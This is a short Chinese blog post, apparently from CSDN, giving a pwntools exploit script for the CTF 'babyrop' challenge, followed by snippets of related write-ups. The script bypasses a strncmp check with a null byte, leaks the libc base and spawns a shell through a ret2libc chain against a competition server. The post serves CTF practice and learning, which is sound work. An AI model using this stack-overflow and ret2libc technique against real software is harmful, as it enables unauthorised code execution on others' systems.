暑假pwn训练(十三) pwn babyrop

最新推荐文章于 2022-12-06 16:32:15 发布
最新推荐文章于 2022-12-06 16:32:15 发布
阅读量324 收藏 1
点赞数
分类专栏: 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/100076340
版权

这道题我没时间去仔细的想
emem最后说是00截断长度判断的函数然后正常泄露libc基址getshell
先上exp晚上说说我调试的过程

#coding:utf-8

from pwn import *

context.binary = './babyrop'
io = remote('47.112.137.238',13337)
# io = process('./babyrop')
elf = ELF("./babyrop")
libc = ELF('./libc-2.23.so')
# libc = ELF("/lib/i386-linux-gnu/libc.so.6")

io.send("\x00" * 0x1 + "\xff" * (0x20 - 0x1))

sleep(0.2)

payload = 'a' * 235 + flat(elf.plt['write'],0x8048825,0x1,elf.got['write'],0x4)
io.sendline(payload)

base = u32(io.recvuntil("\xf7")[-4:]) - libc.symbols['write']
success(hex(base))
system = base + libc.symbols['system']
success(hex(system))
binsh = base + libc.search("/bin/sh").next()

#gdb.attach(io,'b *0x8048824')
io.send("\x00" * 0x1 + "\xff" * (0x20 - 0x1))
sleep(0.2)
payload = 'a' * 235 + flat(system,0xdeadbeef,binsh)
io.sendline(payload)
#
io.interactive()

pwn好难

doudoudedi
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【BUUCTF - PWN】baby_rop
古月浪子的博客
04-05 369
checksec一下,栈溢出 IDA打开看看,很明显的溢出点,/bin/sh字符串在程序里也有现成的,通过ROPgadget找到pop rdi命令即可将/bin/sh作为参数调用system from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_leve...
rOpbaby-CTFPWN ROP练习
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
BUUCTF--pwn--[OGeek2019]babyrop【ret2libc】
最新发布
qq_73149934的博客
12-06 226
BUUCTF--pwn--[OGeek2019]babyrop
2021羊城杯 pwn BabyRop
yongbaoii的博客
09-24 252
显然没开啥保护 显然就是个溢出。 显然是个后门函数 显然作用是能把一个字节与异或一个1 显然有个字符/cin/sh 显然用函数2能把/cin/sh变成/bin/sh。 就一套rop带走就行。 exp from pwn import* r = remote("192.168.39.35", 11000) elf = ELF("./BabyRop") payload = 'a' * 44 + p32(0x80491fd) + p32(0x8049332) + p32(0x804c024) + p32(.
BUUCTF-Pwn-[OGeek2019]babyrop
餐桌上的猫
02-16 2158
题目截图 检查文件信息 开启了NX和Full RELOR 用IDA打开,反汇编查看主函数 查看函数sub_804871F buf[7]的大小为7个字节,而我们最多可以写入0x20个字节的数据,可以覆盖到v5,所以我们可以控制v5的值,在if判断中,如果buf中的字符串与s中的字符串不相同就会退出程序,但是v1控制strncmp函数比较的字符数,v1等于buf中字符串的长度,只要我们输入的数据以\0开始,v1就等于0,那么就可以绕过if判断 查看函数sub_80487D0 a1的值等于上一个函数中的
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
日行一PWN babyrop 动态链接库的使用
m0_57221101的博客
05-17 404
​ 我们在之前的机器中,通常就是利用一段程序中代码段下已有的指令来实现我们得到flag或者拿下shell的目的。但是抛出了一个问题,如果程序中没有危险语句,就无从下手。 ​ 所以,此次我们引出了一个概念,动态链接库libc。这也解决了我一直以来的问题,为什么call的函数点进去只能看到return,因为声明的函数并不在代码的cs段内,而是应用了随机化存储,存在内存的其他地方了。 ​ 之后通过某些方法调用,这个某些方法这事以后的事情了。闲话少叙,我们开始今天的日行一pwn。 开始 例行检查,开启了
buuctf|pwn-[HarekazeCTF2019]baby_rop-wp
l2645470582_的博客
11-08 212
1.例行检查 我们看到该文件开启了堆保护 2.我们用64位的IDA打开该文件 按shift+f12查看关键字符串,我们看到“/bin/sh”这个关键字符串 我们双击查看它的位置:0x0601048 3.我们去main函数里面看看 我们发现v4 = var_10,他的地址为:0x10 我们要拿到权限:system("/bin/sh") 所以我们要找到system地址:0x0400490 我们双击_system,system在plt表里面 4...
【CTF】bjdctf_2020_babyrop
凉水的博客
06-18 693
bjdctf_2020_babyrop
bjdctf_2020_babyrop【BUUCTF】
qq_41696518的博客
08-31 324
bjdctf_2020_babyrop
【BUUCTF - PWNbabyrop
古月浪子的博客
03-25 1739
checksec一下,可以栈溢出 IDA打开看看,读取随机数作为参数传入函数中 读取输入,进行字符串比较,不同则退出,相同则返回输入的第8个字节,可以通过输入 \0 绕过字符串比较 返回的字节作为read的长度,buf只有231字节,可以通过传入255来栈溢出,然后就是标准的ret2libc了 from pwn import * from LibcSearcher import * co...
CTF-PWN-ROPbaby(实验吧)
SuperGate的博客
02-07 1852
学rop的时候刷到的题,感觉很有启发于是就写下来。 本文很大程度上借鉴了如下文章: http://wzt.ac.cn/2018/04/02/ROP/ 进入正题。我们发现题目中给了我们libc的文件,在ropbaby程序中也可以直接查找libc基地址,因此我们就可以不用在主程序中寻找了。 首先我们查看ropbaby文件的保护方式 由于开了NX,shellcode的方式就不好弄了,因此我...
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2568
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
[BUUOJ]bjdctf_2020_babyrop
Do1phln的博客
10-24 403
先checksec,64位小端序,MX保护开,其它全关,接着进入IDA分析main函数内很简单,进一步分析后找到关键函数vuln本题没有找到backdoor,所以应该是做基地址泄露然后getshell,整个程序内只有puts函数可以输出内容,因此对puts函数进行修改,先溢出后转到此处,考虑到系统会对堆栈进行平衡,所以我们要修改puts的参数需要先进行一次pop保证堆栈平衡,因此使用ROPgadget先找到符合我们条件的ROPputs_got是puts函数的got表项地址,里面装的是puts的真实地址。使用
BUUCTF:bjdctf_2020_babyrop2(write up)
qq_44768749的博客
08-26 913
BUUCTF:bjdctf_2020_babyrop20x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,开启栈不可执行、canary、部分RELRO保护 0x02 运行 输入两次字符串 0x03 IDA main函数 调用了下面三个函数 init函数 初始化,输出提示 gift函数 存在格式化字符串漏洞 vuln函数 存在栈溢出漏洞 0x04 思路 开启canary保护 可利用gift函数

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值